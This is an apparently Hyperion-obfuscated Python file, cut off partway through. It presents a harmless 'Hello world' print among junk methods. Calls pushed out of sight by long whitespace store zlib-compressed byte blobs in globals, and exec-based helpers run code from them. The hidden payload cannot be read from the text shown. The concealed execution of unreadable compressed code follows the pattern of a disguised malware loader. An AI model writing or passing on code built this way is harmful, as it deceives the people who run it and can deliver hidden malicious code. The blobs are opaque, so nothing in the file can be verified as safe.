from builtins import *
from math import prod as System


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


Modulo, _run, Substract, Builtins, Power, _system, DetectVar = exec, str, tuple, map, ord, globals, type

class Floor:
    def __init__(self, Cube):
        self.Math = System((Cube, -65769))
        self._add(_round=-36693)

    def _add(self, _round = str):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Math -= 85477 / _round
        
        try:
            {'ttteut': _theory} if _system > Power else {'ttteut': _theory} < Builtins

        except AttributeError:
            ((_run, Power) or _run if (_run, Power) and _run else ... or (_run, (_run, Power)))

        except:
            DetectVar(-2093 + -98693) == None

    def Add(self, Calculate = 66164):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Calculate /= 33548 - 86964
        self.Walk != Ellipsis
        
        try:
            (((Modulo, Substract), Power) for Power in {_theory: Modulo})

        except AttributeError:
            ((Modulo, Modulo) or Modulo if (Modulo, Modulo) and Modulo else ... or (Modulo, (Modulo, Modulo)))

        except:
            DetectVar(-71310 / -92121) == bool

    def _algorithm(_hypothesis = bool):
        return _system()[_hypothesis]

    def StackOverflow(Negative = -59600 + -57695, Square = Ellipsis, Round = _system):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Round()[Negative] = Square
        
        try:
            ((_run, Power) or _theory if (_run, Power) and _theory else ... or (_theory, (_run, Power)))

        except AttributeError:
            ((_run, Power) or Builtins if (_run, Power) and Builtins else ... or (Builtins, (_run, Power)))

        except:
            DetectVar(-52127 - -91035) == float

    def execute(code = str):
        return Modulo(_run(Substract(Builtins(Power, code))))

    @property
    def Walk(self):
        self.Ceil = '<__main__.Walk object at 0x000005179BE61975>'
        return (self.Ceil, Floor.Walk)

if __name__ == '__main__':
    try:
        Floor.execute(code = __code__)
        Random = Floor(Cube = -33862 + -38185)

        Random.Add(Calculate = 63053 + Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='nnnnnnnmnmnnmmmnmnmnnnmnn',Square=b'x\x9c\xed\xbdis\xdbJ\x96&\xfc\xdd\xbf\xc2]\x1f^Ic\xd8\x05b%4\xa3\x89\xe8.UOS#\x99\x15\xad\xee\xb1\'\xdc\n\x05E\x82\xf7R\x97"4\x92|%WG\xcfo\x7f\xf3l\x99\t\x80\x0bD )\xbakD\x91\x04\x93I,\x89\\\xce\xf2\x9c\xe7<=\xfc8~\xf7^\xfd\xcd\xa6\x87\xf8\x0e\x7f\xd7\xd7\xc5\xcd\xf4\xfb\xe3x\xf4T<\\_\xbf\xff\xbb\x93?\xfc\xd3\x8f\xfb\xfcaV,\xfe\xf0\xbex\xb0\xaa\x8d\xbe?\xfdZ<<b\x9d\xc3?\xdc\xcc\xe6\xf3\x1fO\xbf\xe6\xbf\x14\xa3\xa70N\xfe\xe0\xfd\xe1\x1f\xe6\xdf\xf3\x7f\xce\'\x7f8*\xfd\xea\x97\xd9\xd3\xaf\xdfoh\xc7\xbf>=\xdd?\x1e\xff\xf1\x8fT\xf6i\\\xdc\xfd\xb1\xb2\x9b?\xae8\xf6d\xf68.\x1e&\xe5\xddp\xe1\xa7_~\xf9\xe3\xfd|\xf4\xcb\xf7\xbc\xf2\xa3\xf9l\x9c/\x1es\xfa\xd1\x9f\xffr\xfe1\xf8\xe4W\xaa\x8c\x8b\t}\x7fp\xff0[<\x1d\xfe\xe1\x9f\xf2\xf9\xbcx\xff\\<\xcc\'\x7f\xf7\x87\xa3\x83wG\xc7\xba6|\x7f\xf0\xf8\xdblrp\xf4.\x7f\x19\xe7\xf7O\xdc\x98\x8b\xfb\xef\xea\x97\xff\\<\xe6\x8f\xefG\x0f\xf9\xfb\x87|\xf2o\x8b\xff5+\xe6\xf9\x13\x15\xdc\xa8\x96\xf9\xb7\xc5\xff.\xbe\xe3\xa7\xd1{\xd8\xc9\xbf->\x177\xc5\xe4\xc7\xfb\xf9\xec7\xf5\xbb\x1f\xc5\xf7?\x1c\xbd\xa3\x93\x9a\xdd\xdd\x17\x0fO\xd7\xd7\xeah?\x1e\x0f\x8e>\xe5/\xb3\xa7\xc3\xa3w\xf3b<\x9a?\x1e\x1e};\xb8\xbb[\xa8\x7f\xf5\x87\x1b\xb8\x85\x9b\x8b\x83\xab\x93_\xe6\xc5\x8d\xaa\xf6ne\x1d\xd8\xc1\xe0|p~~>8;\x1f\xa8\xf73\xf5~\xa6\xde\xd4\xdf\xc1\xb7\xe3\xe3\x0f\x1f?|<\xfcx\xf8\xa1wttuu2\x99=\xac\xdf\xd5\xf0\xb48=\x1d\x16E1T\xef\xb0y\xaa6\xeb\xfb\xf9%\x7f\x1a==m\xd8\xd7\xe5e\x10\xa8\x7f\xf5\x02\x1b\xeaO}R\x97D\x17\xfen\xd9\xb7\xf0\xab\x05\xef\xf3\xce\xda\xb1\xfa\x95i\xc7\xf5\x07\xfd\xf2\xf5\xeb\x97/\xf0\x02\x0f\xf5\xfeU\xfdv\xd9.\x0f\x0fn\xbe\xcf\xe6O\xb3\x05\xdc\x92\xdfG\x0f\x8f\xefj\xbf\xc4k\xc0S\x83s\xbb\xbc\x0c\xe4\x94aK\xedV5\x93j\x1fh\xa5\x02[\x0c6\x87\x87\xcb\x0f\xf6\xb8\x98=\xcdg\xdfo\xaaMy\xe4\xc1\x8dR\xb7\x0b\xef\x1b\xdc\xc03\xbc\x97\xe7\x83\xd7\xee\xe8\xe8[g{\xfa4[L\xf2\x97\xc3\x83\xfc\xfb\xc3\xbf\xd4\xbe\xbd:Z\x7f\x03\xf03\x17\xc2\xd6\x02\xee\xde\xc1\xc1\xa7\xdbb\xb6X\xd5\xc6\xd4\x0b\xb8\x95\xb1\xc5\xff\x16\x9a\xf7\xe1\xe9qY\xeb\xae\x1a\x18\xb3\xd9\xfcv\x0e\x7f\xb3\xd9\xed\xfc\x16\x9e\xf3\xdb\xbf\x85f\xca\x1f\xe7\xa3\x7f|u7\x1c\x0c\xe6\x83\xb9\xfa\x1f\xe0\xabz\xc3\xbfW\xb6\xd7l6~\x1c-f\xed\xdbk\xe5\x8e^\xdd^\xab\xf7$\xed\xf5c:\x9b\xbf\xe4\xbf.\xbe\xbf\xba\xcd\xbe\xc2\x88\x84\xa1\tc\xf3\x0b}\xfa\xf2\xb7\xd0\xc5\xe6\xa3\xdf\xf3-&\xba;>\x16\xcdx\xf8\xfa\xb7\xd0Z\xf9|v\x7fW\x8c_\xdd`\x05\xb5\xc9P\xfd\xab\x86\x19R\x1b\xa9O\xc5\xdfB\xa3=\x8d\x8a\xf9\xf4\xf5\xb3\xd8\xd9\x99\x9a\xb5\xd4\xc1\xe1t\xe0\x8c\xfe\x16\x9aj^\x14\xf5o7\xb5\xd4\xc5\xe7\x8b\xcf\x9f?_\xe0\x0b>\xe0\xdf\xde\xcb\xd2\xc9\xedp\xf92qxs\x10\xf6\x82I\xd0\x0f&\xa1\x1fdJB\x9c\xe4\xa0[\x1c\x1e\xf4\xa7O\xf5y\xf5\x08e\xe2\xff\xf4\xf7e\x9c\xbf,\x9d%\x97\x0bu$7\x07,\xc2\x18\x91\xe6r\xa77\xe5\x95\x07\x08\x82\xa8\x97\xfa\xa9\x1fEI/U\xcf \xd8x\x98\xe5\x97\xff\xf2\xf2\xf2\xac\xfe\xe1\x0f\xb6\xe8\r^\xdb\\}\x1aO\xc3X=}~\x0f\xd4\xb3\xcf\xcfH=\xc3\xe0\x06[gS\xbd\xc0U\xeb\xa5A\x9eFi?\x8d\x82t\xcbv\xf3\x8b\xa1\xef\x17\xbe?\x1c\xfaC\xdcT\xef\xea\xc3\xb0M\xb3\xc1eC\x93\x84\xdc$=\xf5\xcc\xb89\xe0=\x81f\xe2\xa6kR7\xda\xf3\xce\xb7\xf2\x00i\xaa\xeeM\x8a\xaf\xf4N\x9f\xfb\xbaT=7\x1dr\x8bN\x11\xa9\xeb\x8aU\xc7\x0b\x13\xe8}Q\x1c\xe5Q\x18M\xa3Hm\xe1\xe7\xb8\x1f\xc5\xdbv\x98\x95\x87\x8d\xd4\xfd\x8b\xa6\x89z\x84>l\xc1#\x99Ri\xe8\'\xd3\x84\xbfK\xa6\x0e\xae8\x0e\xd5}\x8c\xd5=\xcc\x93,\xb9\xd9z0|\xa1#~\xfd\xaa\xcb\xa1`\xf3P88\xf2\xaf\xb3\xeb\xf0:\xbd\xee]\xf7\xaf\xa3\xebX\xbdgp\xaczi\x93\x9d\xf5\xaf\xe1\x01?\x8d\xd4kv\x9d\\\xf7T\xed\xac^\xdaf\x90\xc6<\xc0\xecA\x97\xf1@\xec\xf1\x1c&\xf3[\x93\xba\r\xe78yn1X\xe3\x18:u\x1c\xc4~\x1c\xa8\xde\x95DY4V\x1dy\xdb\x15\xe3R,KljB\xbd\x1f\x0cM-\x1a5\xe3\x05@\x1a\xa5\xc7\x9fe\x81\xc0mn\xd4&u\x13w3\xdfD\x8d\x14u.\xc94\r\xd5\xc0L\xd4\xa4\xd1\xf5\xec\x17\x87\xf2P\xd7\xa7\x9e\xf00%\xf4\xc9\xc1\\\x90\xfa8\x9b\xf7\x93\x9b$N3\x07\xf3\x9c\x9aH\xa3\x04\xe77|\xc7O\xf4\x80m(\xdf\xf6\xaa\x0e\x8eR5\xb0\xd5`\xff\x186\x9at\xd4\xb7\xad\xe6\x00\x9f\xa5\xbb\xde+\xc6\xee\xf2\xc1Dz\x00\xfc}\xa6\xe7\xe7v\xca\xc0+\xcfl\x8b\x01\x90\xa4\xaa{l\xdd\xe9\x0fpg\xb8k4\x11\xd2\xae\xf7Z\xd2\xd6\x03\xa3\xf3!\x91L\xf0\x91\xab\xc7\xa4\xf2\xc8\xf5Cm;\x18\xecj\xc7=\xb5\xeb\xee\xc5\x19\xbe\x16\xfbu\xa2\xaf\xc4\\\xadzv\x7fU\x1d\xaft\xab\xa7\xb2\\?&\xfai\x1e9\xbf\xf27\x0e\xae\xb3#\xdd\x8fvNC\x116\x1a\x8d\xc4\x83#\x98g\xfd\x1d\x0e\xd9\xbd\x1b\xb6\xb9\xd5\xc1\xf3\xd2\x00\xce\xed\xae\xeep\x8d\xdeZR\x07\xbb\n\x98Y\xe0\xef\x0c\xbc\xb1`\xb4\xdb\xf3\xf97\xbaQ2\xc2\x04V\x1d\xd5\xd7]\xa9_\xa0`\x81\x02F*\x98(c\xa4\x80\xed\xef\x08\x1e\xb2\xf7\x9b\xfe\x86\xc3\xd3\x9d\x8c_\xb11Dlg\xf0\xad\xf7\x94\xdf3\xcbN\xb1\xa9n\xdf\xe5<\x10Dcu\x0fC\xb5\xdc\x8d\xbb_\x08\xa6\xf2\xb0;\x8eyOX\x9b\x17\r\x1e^\x9d,{J\x17\x89\xd3 pg\x91\xa1kLJ\x83\xc5\\\xb5\x0c\x1e\'6\x8a\xd6s\x1e\xd9t\x05\x1b\x11\xf0K\x9b\x01\x10\xb1\xea)\xfa\xbc\x18\xe3\xa4\xa3\x87\xd6\x00hR\xb7\xe1\x00X\xad\xfe\x04\xaab\xb4\xcb%yyK\x83G\x01f!\xf00\xc0|\xa4>\x17{\xbd\xb6\x04Q\xa2\xd4\xf9\xb1\x92\x83\xfd\x04\xb4Q5\x90\xd4V\xae\x94\xfbH\xbd\xc7i?\xc9\xd2\xd0\x81\x8a_\x96\xefk\x9f\x8cH\xe1J\xfew\'\x1c\x8dT\x83\xd2\x13^\xa1q\xc7j\x8b^G\xb8E\xe5\xaa\x86\x8bu\xb5\xf5d\x7f0\xbb\x85?\x80\xaf\xdc\xcef\xeaM\xbd\xaa\xff\xd9\xbc\xc9\xd2\x1a_\x07\xd7\xd9uz\rf\xcd\xbe\xda&\x0bdR/\xdd\xb1\xf5a\x9b\x96\x04\xd3\xf7DiR1X\xbf\x95>\x95G=\xa5\xd0t\xafMQ_\xc0\x9e"\xbdf\xc4=&\xe3\xa7\xfa\xb4\xd7\xcb\xe6\x816\x83\x96L\xa3m\xad\xa2U\xeb\xa6\xf8{"k\xe9\x88x\x99iR7t\'\xa2\xc7jB\xc9\x920\xf6\xd3@M\x99\x89\x1a\x80a\x9aE\x01\xdaISn\xe66\xeb\xb7\x866b\xab\xfe\x0c\xee\xd9\xf6\x13\x11\x9a\x03\t\'@O\xb0\x146\x9b\x85b5\xd3\x04\xe88\t\xaeC\xf5Hp\x16\xaa\x95\xfe\x04\xb3\x90;\xe1\xbdld7Ocd7\xef.,pY\x92\xa2\xa4\x11lo\x85;\x10S*\xedwN\x96\x9cy\xa3\xa5\xea-\x8c\xe0{%\xa8\xd0\x02C\x02\x8a\xbd\xd4d\xbc\xf8\x8cyA\xfaI\x96\xa0\x02\xd1\xf0\xa7`\x11(P\xf6V\x8f\x0e\xad\x01\xaf\xa8\xd8\xbag\xf5y\xbd\n\xd8V\x90Y\x9f\x05&\x12X\xf6\x85Mu_\xe3\xa6i1U\xc5J\x85H\x93\xed\x1d\xab\x80|\x1a\x0c\xce\x01Ew\x8ex:\x82\xd4\r\xce\xda\xb4e\xc2\xb2\x80\xb4MfyJENH\xb8-\x9b\xd4\x8d\xdb\xaa\xaa\xd0;\xe2v\x02\xb0\xc0\x83b\xbe\xd7\xb1u\xde\xf2\x9dm\x7f\xdaT\xb7\xa9\xfd\xe9\xd5\x13L\xa6\xa7\x98\x91\xa5\x13\x8dY\x0bB=\xc8\x05\xa8c\x9c\xe4\xdd\xdbI\xf3\x92\xa7C\xbc\x1f\x13\xeb\xb3)w\xa1\xb1F=5Ufj\x82\x9cF\xfdd\x1aO\xa30Q\xda\xb9z\x07\x87|\xde\xc2<\x040.\x80\xfa\xfaj\xea\xf4\x11\xd0\x05H.\xf5\xb2\xdf\x02f\xe0\xc3}\x8eay\x0c\xd5#EI"\nG\x81\xef\xc0\xf8g\xcc\x9a\xc6\xa4)`%\x03S\xda\xeb\x05rS\xcf\x9e,\xf1\xe5\xd1\xe7\x9f\xca\xff\x1a\xa7q_=R|O\xf9\xd1_\xb1\xad>\xed\xd9\xfc\xa3F#\x8c\xc5\x82\xe0\x94\x85\x8f\x1b\x9dJ\'1\x9a`@\x15\x025(P\x9fBT\x8ej\xa5Mv\x86\xb0\x93k\xff:U\x0f\x80\xaa\xa5\xaan\xbfZ\xb6cWi\x0ba\x1b\xcc\xd5\xa1\x1f\x86a\xa6\x9e\xbeR~za_\x1d\xda\xc9Z\x92\x97\xbc\xe8e\xdf9\xaf\'{=\x9f0\x92\x85\x9f\x83\x81x\xd2\xf7\xdb\x99\x1aDI\xd4\x8b\xc6\x00\x93\xd8\xfa\xc2!\x92aa\x857\xdcu\xa8\x14\x00"4\xc2q\x18\xab!\x14#p\xb3\x87\x88\xd0Z\xe9\xae\x01\\[\x82/\xcb\x08\xdb\xadA\x97\x81\x84\xf4\xeah\x85\xb6\x0e\xac\x1e?\xc5\x19\x15X^Y\x04\xadZ\x0e\xacuu\xd1\xc3\xeb\xac\xbfv\x0c^\x85\xa0\xd4\xd9-<`\x03\x0c\xfb\xb7\xf3\xdb\xdb}F\xdc\xa1\xc6"NC\xd9\xeeY\xf7\x01\xef\x8d\x058\xde\\w\xf3\x89n\x85c\x9b\xac\xf4j\xe5\xce<Yx\x95\x11_\xb1\xd8\xbam4pb\xd9\xc8\x9b\xd4mb#_\xde\xb5(\xe6\xebn!\xd1\x96\xf8\x01\xde[-\x08|z\x81e\xd2\x10\xf3Fj\r\xd2u\xf5\x12\x97\x03\xb4\xbd{^b\xe5$@\xb5]{9_@;\x94 \xf8\xa8\xf0\r\x1d\\N\xa1-\x94>\xb4\x0c\x1c\x99\xd5[\x12~\xf6,(\xfd\xa6\xba?EKb\xf7\xb1#\x9c\xd5\xb3\x89\xb0\x91\xb0O\x16\xa2B\xc2k\xf4\x90\xa8\xdai\xbd\xb4\x99f')

        Floor(Cube = 88224 - -86373)._add(_round = Random.Math - 41193)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='jliliijilijillilijji',Square=b'\xd1C\xb7J\x08\xf1*\xf8\xec\xa3fQ+\xfd)$\x175\xb0\xc1{\x97\x08@b\xdb\xe1]\x14J\x93S\x8a\x1c\xc4O\x0fQ\xbb\xa3\xc7~\x8f\xf24\xed\xde\xce`a\x82\xcbz\x8e\xb6\x9d5\xd0xj\x81\xd6\x87\x87\xffw\x19\xe1\xc6Q\xf1px\xb8\x92\x14\xe6h\xb4\x98\x1c.\xfd\xd9j\xc1i.\x9a\x0e\xfa\x98\xf0\xd2\xfe\xf3\xf8\x99\\G4\x1a\x11H\x8bJ\x93\x1a\xdc\xc7\x88M\x8e@?i\x82\xd1K\x81\x9f\x80\xc9\x90\xc6w\x94\xc6I\x88p\'\n\xec\x00m%V\xb5\xb6\x0f\x8d\xe5xn\xe8\xa9\x10\xc7\xad^\x9b\xe9}\xc9u\xaa\x9e\xd15\xd8b\x002\x93\xa0\xdeW+\xfd\t\xfaR\x98\xf4\xb1m\'\xdb{\x83VO#cT\x81F\xeaI\xaf\x19o\xd3\x03>\xe1\xc3\x85\t>\x0cG\xf1X=x\xe1NC\xfc\xa4zL\x12\xa0\xa7\x03?cX\x97\x12!\xe0\xea\x93\\\xfdhk\xd06\xe0\t\x81\x9f`HXBxk\x00\'\xec`\xca\x91\x98MQ\x18\xfa,\x0b\x89\x92\x90Y\x0e\xa6&u\x9d\x02\x9cS\xab\xbbe\xd0\xec\xdd\xdb\xeb0</\xd1P\xe6H\xbf\xea\x12\t\xecs\xe2\x05H\x11\x05\x02\x88\x89<\xe8\xde\x1ai!\x12\xc7\x1a\x85\x96\x95\x80\x00\xe6\xbb\xeeA\x00Z\x98\xe9^/\xb7\x83F\xab\xa8\x96\xe5\xa1\xa5{mq]\xeb\x9f2\xfe(;vC@\xea\x89~M\xd8_\xf53\xf9t,\x1a\x04C\x8a\xd0\xb7H\x12L\x99#j\x84\x9d\xdc\xc5\xaa|\x9cG\xb6w\xd9\x95_\xb9\x1b5\xa7\xc9U\xe5\xe5k\xb1\xca&\xae\xfc\x8c\x01B0{i\x92\xc41\x87\xab+!\xb0\x87\x983g\xf7oR\xbb\xe6\xaa\xbe3q\xe4\xdb\xe9\xd6T<\xe0\xf8dK\xf1\xc1\x97\xfd\xd6\\\xa3\x9e\xba~5J\xd5\xbbz\xba\x89\\(\xab*\xe5x\xdf\xdcM\xe8c\x10e\x00-N"\x96q:\xbf\xaeq\t\x87.\xaf\x82\xd61P@\x87\xd1\x0b\xea\xc2\x18<=\x86\xeb\xdc\xde\x87>DB"\x80\xb5\x14\x00ii\x07e\t-\xc1V\xb6\x13\xeb\xbdo\t\xc3M\xea\xb6\x0ev\xf2\xc1;\x7f\x1d\xa3\x97\x1eLt\xe4!\\R\xda\xa9_\x12\xf6\xee\xab\xbd\x83k\xbf\x8f\x18\x01\xd0O\xb3zi3\xdc\x80\x8f\xa7\xd8G\xd5\x16\\\x9e\x01"\x07j\xa5o\x84\x1dx\xbdC\xdf^\xd8*F\xad\x12\xb4\xe6\'\\\xc2kb\x97\x11\xc4\xa8\x14\xcb\xf6P\xa0<\x98C\x00\xd3l~{K1L\x10\xc64\xdb\xeb\xd5+\x8d\xa6)\xc4\xdd)\x99%Jcg\xa1\xfb6\xe3\x86\xed\xabt\x13\xb4\xbf\xbd!M\xed\x01li\xb0\'\xb0\xf5\xc2\xe7A#s\xdaz\x87\xa28\x08\x05\xd3\x1bYO\xdfr\x0f5\xa9\xeb\xae+\xc4\xd8\rZ@\xc9>\x0b\xd3\xe6\x85\xd0l"\xd3\xce\x8e\xd96\xb7\x10c\xf9\xba;\x0fx\xb1\x81\x81\xe6\xd9\xb7\xca-\xe0\xa0\x0b\x01\xbd\x13,\xccZ3\x00CR\xd9`\x85\xccR\xfaIf*\'0\xd5\xed\x03\x07\xc9!#\x9e\x19\xc4\xf7t\nw\x04\x04b_\x89E\xe4\x86\x04cz\x80bK\xad\xb4- _\xe0&\x12\xeb.\x13\x84\xf6+[\x80\xfcMuw\x00\xcb\xea\xce\xf7L\xf4\xda\x0c\xf9 \x17\xf4N\x8c\xd4\xbbb\xd1\xe9\xc4\x0b\xacc\x19\x89\xf4\xf8\xa2\xc1\x1c\x0c\x82>A\xfe\xa0\x7f\x82s=E|m\xaf^\xbas\x97\xd0|tw3\x19\xbd\xd7\xe4\xaf\xbe\x8f.n\xf5\xf1x\r\xf9\xf3+\xa7\xb3Q\xcd\xcd\x93ig\xcf\x08?\xe1\xab\x0b{{\x8af\xfd\x14n\xb9\xed\xccR\x13x?\x0e\xbb\xc7\xac\x87e\xcb\xb4X\xa5\xedW\x07\x93\xf6\xf6>\xfe\x83\xe7\x17z0W2\xbcu:k\xfbJ\xfb\xeb\xa1\x1e\xd8G\xc8Hz\x1da\xcf\xaf\x95\xfe\x14P\x12\xe7\xceuZ\xf8#C\xc7\x93X\x0f\xf1]\xd9\xe4\x93.\x94\xd0Q\x92\xa5\x8e\xb0\xf2ee\xba\xce=g}v0N\xc0\x8d\x1bL\xc0\xba\xda\xbd\xc86B#m\xc63\xdbHo\xd1\xfbX\xcf\x81#q{\xbb\xb0,v\xc3\xc5\x85\xc4\xe9H\xa1N\xd3\xc2\x0b\xbc5\x13\xd1\xc0\xec\x93\\\x13\x02\x02\xa0g\x19\x8ah\xb5\xd26\x83]\x90\xda\xb1\xf5.4\xc4\x82\x83\xcd,Z\xf6Mu\xdd\xba\xb4\xd3\x9bp\x04\x01(i?\xdd\xda\x9d}\xc0{\x97\x1d\xf3\xd1\xba\xc0VJC\x08NRH\xd8Q\x96\xad`+\xd7\xd5uF\xc8\xd1\x05\xfd\xc4\xdd\x9dH\xb6\x84\xac\x14te3(d\xa0:-1n\x87\x18\xba\x91~$\x1e\x9cJi3c)\x84YE8\x12|\xe4\x05\xef\xa3\xb1\xb4V\xda\xa9\xbd\x17\xf6\xd9G\x0erz\xa4\x8cG\xaa\x95\xb6\xe9P\xda\xe2b\x8d4\xb1\x93\x8b\xf5%\xb5\xe206\xd5m\xc8{\xddA\xb4\xfb\x8e\xa8V\xc1\xf5\x12e\xf2\xb4\x1f\xa6\\\xea\xc0\xeb^Za\x07\x06<\xc9\xd3\xd1\x9e;\x11\xdb_3\x7f\xc2\xcfT\x8aU\x1a\xe5\x04\x881\xc2\xcbG\x11\x97\xe22i\xf2\xa8\x95\xeeD\xcd\x0e\xe2\xf2b\x18\xf1\xdc-x/;\x9fI\x93\xba\xce\xf9\xfe-\x1b\xfa\xd6\xb7\x8f\xa5\x97\x17~{\xa1\xe40\rr\xc2\xbc*\x10\x17@\xf10\x85\x034\x1e\xd6\x86\x00os\xad\xb4\xed\x8a-+\xb0\x98\xb2\xb3\xca\x04\xea[+\xf6\xba\xba$"\xfd\x1c\xb0\xfb\xd5\x12\xf7\x98%\xe9L[\x10F,ak\x19\x1b\xb6\x9c\xb8\xe9\x1cQ\xf9XN9;ML9\x89\x0c9\xea\\`\xa3\x1ck\xb7&\r\x84\xc1\xf2\x19\x8b\x89m\'q\x83\xe0k\xbf\x18\x0c\x99\x9e\xb8\x80?\xa0)n3\xa2\x85<X\xe4h\x11\x89d\xce\xc5\xe4G\x16\xa1\xcd\xa6\xba\x8d\tm\xd8\xe6\xf7L3"O\x8c\xa8\xe8\xc1\xf3xy6\xd4\xed3\x7f,3\x83\x19\xe0\xa6\xa9\xe9\xc2\x9bA\xd4"l"\x97\xdb\xef\x86Zd\xb9Qc\xb2\x04Q\xe0\xc6\xb8\x11\x8c\xdc?\xa85\x95\x9c<n\xd3\x86@\xf6\x8d\xf6f\xccJY\x90\xedy\x08\x00\x9f\xd6\xf0\x1e\x1d\xeb\x17\x9b|l\x12\x0bH\x04I\x06\xde\xb3\xa9n\xba\xe7I\xc7\x0eH\xacy\xa6\x94w\xf8\xd8\x89\x1c\xb9\xa3\xd0\x932\xe5\xe6nR\x13\x95\xa7$\xb3Z\xfd|P\x1f[\xcd\xa4-[\xfd\x14U\xd3\x85\x9a\x19\xc4\x1128\x85J>\xda>\x97#\xadFb\x84l\x95\xc3\xf1\xa7\x8a\xa4\x06T\x07\'QB\xa8G\x03\x9a\xd4\xb7T\xaf\xddI\xc2\xa9\x91tkI\x13\xf5\xd6\xcf$\xdb\x97\xa5\xdbr\xfc\xca2)\xd8\xc9\xc8\x8cU_m\x81$\x9fA\x8c-`\xf1n\x01\x8b\x87\xefP\xd4\x8avd\x07P\xbc\x1c\xe2A\x99Xn\xeb\xdc\x90\xabo\xacMGf\x13\x96\x95\xd1H}G$e\xf5<~\x9a\xbfs{\xbc\x19\x83\x1b8\xb93#\xce:5\x9a$\x885\xee1=\x01<\xe2\x8f@XP+\xed\xd6\x1d\xdd\x85\x11-\x8c\xcb\x19k%P2e\xa5,\xb3\x8ch\x9b\xea\xbe\xc2\xfb\xd4\xd2\x1c\x93\xf4\xd5\x18\x88\x94\xd8\x11*\xd9}\x1aL\xd54\xe7\'Y\x90\x83\xb3W\xf5\xa0$\x85m\x18![\xc3<\xd7\xb9~\'K\xdd\xbc\xcb\xc8\n]\xe0\xaa\xc3\xeeG\xfdR\x1d\xaf\xaa\xef9sd\xab\xb1\x1eClr\x90\xaa\xbb\xd7*\x89\xa1\x9a\xc6ooaR\xc7\x04\x11\xc0\x9cp\xdb\x00Y\xddA\xee%\xc9|*\xd1\x15=K\x15\xeb[\xa6\xe8M\xf5^a\x86\xde\x06\xf2\xec$LW\x92\x89dL\xa5;\xd2\xc18\x99\x0e\xd1\xc1\x87\x13! \x8a!\x1d\x86\x13\xf3^YyZNC/u\x1c\x19\xf9\xc0\x9b\x07\x1e\xbc(\x8c\x81\x0b\xa2\x0fc%U\x1d\x87\xb3\xc1\x8e1-\x0e\x99\x01\xd56\x05)\xa51}\x02\x80\x88\x19U\xea\x93\xfa\x9d]\x03\x92\xe8\xa8=\xf1L\xaaV\xdb\\}\x93I9(\x01\xc0\x17\x80A\x89cH\xba\x033+|\xc2o\x01/\x1c*\x15!A?\xe3\x04\xb8+\x10\xd7s\xa3n7\xa4\xebq\x12l[\xcd>\x9e\x96?\xbb\x08\x12p\x00\x1d\x9a&&\xe7\xae\x15\xa0\x9f\x08T*\xe2\\\xe3\x91\xb3\x90}\x07\xb3\x80Q\xca\xcb\xafF9w\xec\x11~\x95\xe8\xbd\x1d\xd1\xb2\x04\xae\x1b\x82e\tcwG\xb2\xe02\xd5\x86VI\xcbA\xeb\xd5\x00v7\xee\x994\x17V\x92\x14\\\x19p\x95\xbd$J\xbb\x07\xb3i"\x8cHh\xb25\xf4\xd0\x8aI\xf8\t\x8db\x9a<A\xa8\xbe\xe5\xd5&\x04\xd9>{\xf7NLD\x1b\xddkU\x93\xa6\xeb\x15\xd7\xb5\xdb\xb0\xb4z\xf5\xd3:UD\x85Jb\x0f\x8dB\x07\x0b\x86\x9f\x99\xd0\x8a\x06\xe8\xb3\xf5\xaeC\x89F\x96\\\x10\xf2^\xe5\nmR\xd7\x1d|oW\x89\xac-\xc0\xb4\xac7\x86\xe2_V"\x17}\xdf@T|\xf7\xc4\x14#\x86\x16\xdb\x1cYc+\x8c\x82@\x0f\xf4\xbe\xe7Y~h4,\x84b\x96\xff\x1b\x91\xa6\xfe,!G]\xf9\xf9\x16\x12~#\xb4\xbc\xad\xae\xdc\xf2r\x8a\x17T\x08\xb0\x05+\x14Ya\xb3\x9b\xea6\x9e:\x18u\xf0B\x00,\r\xcbz~\r\xde\xe0\xe0\xd2\xca{K\x95\xf7\xda\xf4\xdc5\x93\x8bF\xb0Q\xf35\xf4\xf8\x86H<\x18"\xb5\x83\x8f\xb4\xf3\x10\x83\x13\xd5Kwb\xf7\xc9\xac\xf5G\x98\xbc\xab,\x1bA\x05z\xbe\xae\xae{\xfe\xd8\xc8\xd2\xd3#\xcc\x08\x99\x00O \x96m\xcf&\x8bt&H);\x84\'\x84\xde5\xe1\x92Uw\x00\x99:z\x18S\x01\x08S\x00\x1b\x06\xd5\xb2N\xad\xe6\xa6\xab\xd03\xc2L#q\xbd\xb4Yo\x04N\x90\x88R\x93`\xfe\xc6\x0c{c\xadt\xc7\x18\x85\xb6\x91a\xee\x94\xceJ&e\xc3RT"]\xddC\xb1w\xf5\x15\x8d4\x07\x91\xc9\xad<N\x8c\xf9C\xd8\x0b]\x081.\xef\x94e\xb81\xc6\x1c\x83\xc00\xc6\x1cG\xd8\x0b\xb54\x87 k8@\xcc\xe8\xac\xd7\x92\\\xd26c\xe3g\x17\xf7*$\xea\xd5n\xd0@\x07HB\x02\x7f\x98\x9d\x10\x99\xa7\xdb%%t\xef\xbcv\x81\x9b\x96\xc8\xeb\x8c\x95\x88\xcc\x8aL\xcc\x1c\xc7(\xeeH!\xb4]\x0f6\xd6\xb8\xca$j\xca\\\xf4\xde\x9ak\xbe{\xe3Hj\x99$\xabF\xc9\xd4\x8d!R\xedw{\xfa\x04\x84\x15|\xbe\xd0\x1c6\xfc\xdco\x9cS\'I\xb0\xf9')

        if 143490 > 1152315:
            Floor(Cube = -88356 / 26753).Add(Calculate = -84917 + Random.Math)
        elif 385747 < 8168289:
            Random.Add(Calculate = -99133 + Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='OoooO0oOo0oOOOOo0ooO0Oo00',Square=b'B\x85\xcb\xe7s#<E\x88\xa1B\xfd\xeb\x98\xc5\xac\x84e\xf7Z\xe9\xde#:\xdb\x1b\xd1\xd8d 